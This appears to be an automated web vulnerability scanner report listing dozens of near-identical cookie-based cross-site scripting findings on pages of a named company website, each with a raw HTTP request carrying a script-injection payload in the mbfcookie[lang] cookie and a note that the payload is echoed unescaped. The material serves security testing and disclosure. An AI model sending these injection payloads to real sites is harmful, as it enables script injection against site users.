GET /contact HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbce73"><script>alert(1)</script>78e956c9366; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a345"><script>alert(1)</script>86899845244 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6a345\"><script>alert(1)</script>86899845244 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /de/5.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en6a345"><script>alert(1)</script>86899845244; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c53b"><script>alert(1)</script>f0a1f66cb8a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c53b\"><script>alert(1)</script>f0a1f66cb8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /de/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4c53b"><script>alert(1)</script>f0a1f66cb8a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b5ce"><script>alert(1)</script>46a86177217 was submitted in the mbfcookie[lang] cookie. This input was echoed as 5b5ce\"><script>alert(1)</script>46a86177217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deeppacketinspection HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en5b5ce"><script>alert(1)</script>46a86177217; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad11"><script>alert(1)</script>45c595a351a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4ad11\"><script>alert(1)</script>45c595a351a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/9.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4ad11"><script>alert(1)</script>45c595a351a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0de3"><script>alert(1)</script>c78fdd82d6c was submitted in the mbfcookie[lang] cookie. This input was echoed as e0de3\"><script>alert(1)</script>c78fdd82d6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene0de3"><script>alert(1)</script>c78fdd82d6c; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61438"><script>alert(1)</script>bf6eef2e4a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as 61438\"><script>alert(1)</script>bf6eef2e4a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en61438"><script>alert(1)</script>bf6eef2e4a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2791d"><script>alert(1)</script>a9d0e26d8e0 was submitted in the mbfcookie[lang] cookie. This input was echoed as 2791d\"><script>alert(1)</script>a9d0e26d8e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en2791d"><script>alert(1)</script>a9d0e26d8e0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d75d"><script>alert(1)</script>8224aca7549 was submitted in the mbfcookie[lang] cookie. This input was echoed as 3d75d\"><script>alert(1)</script>8224aca7549 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en3d75d"><script>alert(1)</script>8224aca7549; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e43ff"><script>alert(1)</script>b793ea52c1b was submitted in the mbfcookie[lang] cookie. This input was echoed as e43ff\"><script>alert(1)</script>b793ea52c1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene43ff"><script>alert(1)</script>b793ea52c1b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ae"><script>alert(1)</script>00ecfe4a1d9 was submitted in the mbfcookie[lang] cookie. This input was echoed as 804ae\"><script>alert(1)</script>00ecfe4a1d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en804ae"><script>alert(1)</script>00ecfe4a1d9; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a0c4"><script>alert(1)</script>58c339d6161 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1a0c4\"><script>alert(1)</script>58c339d6161 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/channel-partners-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en1a0c4"><script>alert(1)</script>58c339d6161; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b69"><script>alert(1)</script>158d46c471b was submitted in the mbfcookie[lang] cookie. This input was echoed as 90b69\"><script>alert(1)</script>158d46c471b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/com-5fcontent/view-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en90b69"><script>alert(1)</script>158d46c471b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bb"><script>alert(1)</script>910074bfd64 was submitted in the mbfcookie[lang] cookie. This input was echoed as dc0bb\"><script>alert(1)</script>910074bfd64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/com-5fcontent/view-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=endc0bb"><script>alert(1)</script>910074bfd64; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa46"><script>alert(1)</script>3a748a1b21e was submitted in the mbfcookie[lang] cookie. This input was echoed as bfa46\"><script>alert(1)</script>3a748a1b21e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/contact-us-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbfa46"><script>alert(1)</script>3a748a1b21e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d01"><script>alert(1)</script>e5f9fcae8fd was submitted in the mbfcookie[lang] cookie. This input was echoed as 56d01\"><script>alert(1)</script>e5f9fcae8fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/contact-us.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en56d01"><script>alert(1)</script>e5f9fcae8fd; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93e"><script>alert(1)</script>110881cc17b was submitted in the mbfcookie[lang] cookie. This input was echoed as 5d93e\"><script>alert(1)</script>110881cc17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/customer-solution-briefs.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en5d93e"><script>alert(1)</script>110881cc17b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d52"><script>alert(1)</script>29df373fe4f was submitted in the mbfcookie[lang] cookie. This input was echoed as 68d52\"><script>alert(1)</script>29df373fe4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en68d52"><script>alert(1)</script>29df373fe4f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e4"><script>alert(1)</script>c0ea527a00e was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e8e4\"><script>alert(1)</script>c0ea527a00e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/ipv6-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4e8e4"><script>alert(1)</script>c0ea527a00e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e5c7"><script>alert(1)</script>adb9c3d2480 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8e5c7\"><script>alert(1)</script>adb9c3d2480 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/meet-our-partners.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en8e5c7"><script>alert(1)</script>adb9c3d2480; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83849"><script>alert(1)</script>0ce72120c8d was submitted in the mbfcookie[lang] cookie. This input was echoed as 83849\"><script>alert(1)</script>0ce72120c8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-monitoring-security-news-events.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en83849"><script>alert(1)</script>0ce72120c8d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaac"><script>alert(1)</script>506cb8ffb11 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6eaac\"><script>alert(1)</script>506cb8ffb11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-experts-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en6eaac"><script>alert(1)</script>506cb8ffb11; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ce7"><script>alert(1)</script>36f0a831d17 was submitted in the mbfcookie[lang] cookie. This input was echoed as 68ce7\"><script>alert(1)</script>36f0a831d17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en68ce7"><script>alert(1)</script>36f0a831d17; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba46"><script>alert(1)</script>e9a751b4cd1 was submitted in the mbfcookie[lang] cookie. This input was echoed as fba46\"><script>alert(1)</script>e9a751b4cd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
